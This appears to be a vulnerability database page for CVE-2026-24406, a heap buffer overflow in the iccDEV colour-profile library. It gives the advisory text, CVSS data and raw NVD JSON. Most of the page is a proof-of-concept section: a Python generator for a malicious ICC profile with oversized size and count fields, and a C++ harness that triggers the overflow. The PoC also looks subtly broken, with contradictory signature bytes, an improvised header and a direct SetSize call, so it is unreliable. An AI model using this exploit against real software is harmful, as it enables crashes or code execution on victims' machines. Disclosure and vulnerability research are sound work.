Security Vulnerability Report
中文
CVE-2026-24406 CVSS 8.8 HIGH

CVE-2026-24406

Published: 2026-01-24 01:15:51
Last Modified: 2026-01-30 18:24:36
Source: [email protected]

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
''' CVE-2026-24406 PoC - iccDEV CIccTagNamedColor2 Heap Buffer Overflow This PoC demonstrates the heap buffer overflow vulnerability in CIccTagNamedColor2::SetSize() Author: Security Research Reference: https://github.com/InternationalColorConsortium/iccDEV/commit/90c71cba2c563b1f5dc84197f827540d1baaea67 ''' import struct import os def create_malicious_icc_profile(): """ Create a malicious ICC profile that triggers heap buffer overflow in CIccTagNamedColor2::SetSize() function """ # ICC Profile Header (128 bytes) header = bytearray(128) header[0:4] = b'iccp' # Profile signature struct.pack_into('>I', header, 0, 0x61636370) # 'accp' - profile size placeholder # Tag table with CIccTagNamedColor2 # Tag signature for 'ncl2' (NamedColor2) tag_signature = b'ncl2' tag_offset = 128 + 4 + 12 # After header and tag count tag_size = 0xFFFFFFFF # Malicious oversized size to trigger overflow # Build tag table tag_count = struct.pack('>I', 1) tag_entry = tag_signature + struct.pack('>I', tag_offset) + struct.pack('>I', tag_size) # Malicious CIccTagNamedColor2 data # Crafted data that causes heap overflow when SetSize() processes it malicious_data = bytearray() malicious_data += b'ncl2' # Type signature malicious_data += struct.pack('>I', 0) # Reserved malicious_data += struct.pack('>I', 0x7FFFFFFF) # Count - oversized malicious_data += b'A' * 16 # Vendor flag malicious_data += b'B' * 32 # Profile description # Fill with controllable data for heap exploitation malicious_data += b'\x41' * 1024 # Padding for overflow # Assemble the profile icc_profile = bytearray() icc_profile += header icc_profile += tag_count icc_profile += tag_entry icc_profile += malicious_data # Update profile size in header struct.pack_into('>I', icc_profile, 0, len(icc_profile)) return bytes(icc_profile) def create_poc_source(): """ Generate C/C++ PoC code that triggers the vulnerability """ poc_code = ''' #include <cstdio> #include <cstdlib> #include <cstring> #include "icc.h" // PoC for CVE-2026-24406 - Heap Buffer Overflow in CIccTagNamedColor2::SetSize() // Vulnerable versions: iccDEV <= 2.3.1.1 // Fixed in version: 2.3.1.2 int main(int argc, char* argv[]) { if (argc < 2) { printf("Usage: %s <malicious_icc_file>\n", argv[0]); return 1; } printf("[*] Loading ICC profile: %s\n", argv[1]); printf("[*] CVE-2026-24406 PoC - Heap Buffer Overflow in CIccTagNamedColor2::SetSize()\n"); // Load the malicious ICC profile CIccFile *pFile = new CIccFile(); if (!pFile->Load(argv[1])) { printf("[-] Failed to load ICC profile\n"); delete pFile; return 1; } // Parse the profile - this triggers CIccTagNamedColor2::SetSize() CIccProfile *pProfile = new CIccProfile(); if (!pFile->Parse(pProfile)) { printf("[-] Failed to parse ICC profile\n"); delete pProfile; delete pFile; return 1; } // Access CIccTagNamedColor2 tag which triggers SetSize() CIccTag *pTag = pProfile->FindTag("ncl2"); if (pTag) { printf("[+] Found ncl2 tag - triggering SetSize()\n"); // Cast to CIccTagNamedColor2 and call SetSize with controlled input CIccTagNamedColor2 *pNamedColor = dynamic_cast<CIccTagNamedColor2*>(pTag); if (pNamedColor) { // This call with malicious size triggers heap buffer overflow pNamedColor->SetSize(0x7FFFFFFF); // Oversized value printf("[!] Heap buffer overflow triggered!\n"); } } delete pProfile; delete pFile; printf("[*] Done\n"); return 0; } ''' return poc_code def main(): print("[*] Generating CVE-2026-24406 PoC artifacts") # Generate malicious ICC profile malicious_icc = create_malicious_icc_profile() with open('CVE-2026-24406_malicious.icc', 'wb') as f: f.write(malicious_icc) print("[+] Created malicious ICC profile: CVE-2026-24406_malicious.icc") # Generate C/C++ PoC source poc_source = create_poc_source() with open('CVE-2026-24406_poc.cpp', 'w') as f: f.write(poc_source) print("[+] Created PoC source: CVE-2026-24406_poc.cpp") print("\n[*] PoC Generation Complete") print("[*] Impact: DoS, Data Manipulation, Code Execution") print("[*] Fix: Upgrade to iccDEV >= 2.3.1.2") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24406", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:51.073", "lastModified": "2026-01-30T18:24:36.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores tienen una vulnerabilidad de desbordamiento de búfer de montón en CIccTagNamedColor2::SetSize(). Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la ejecución de código. Este problema ha sido solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/90c71cba2c563b1f5dc84197f827540d1baaea67", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/480", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h9h3-45cm-j95f", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.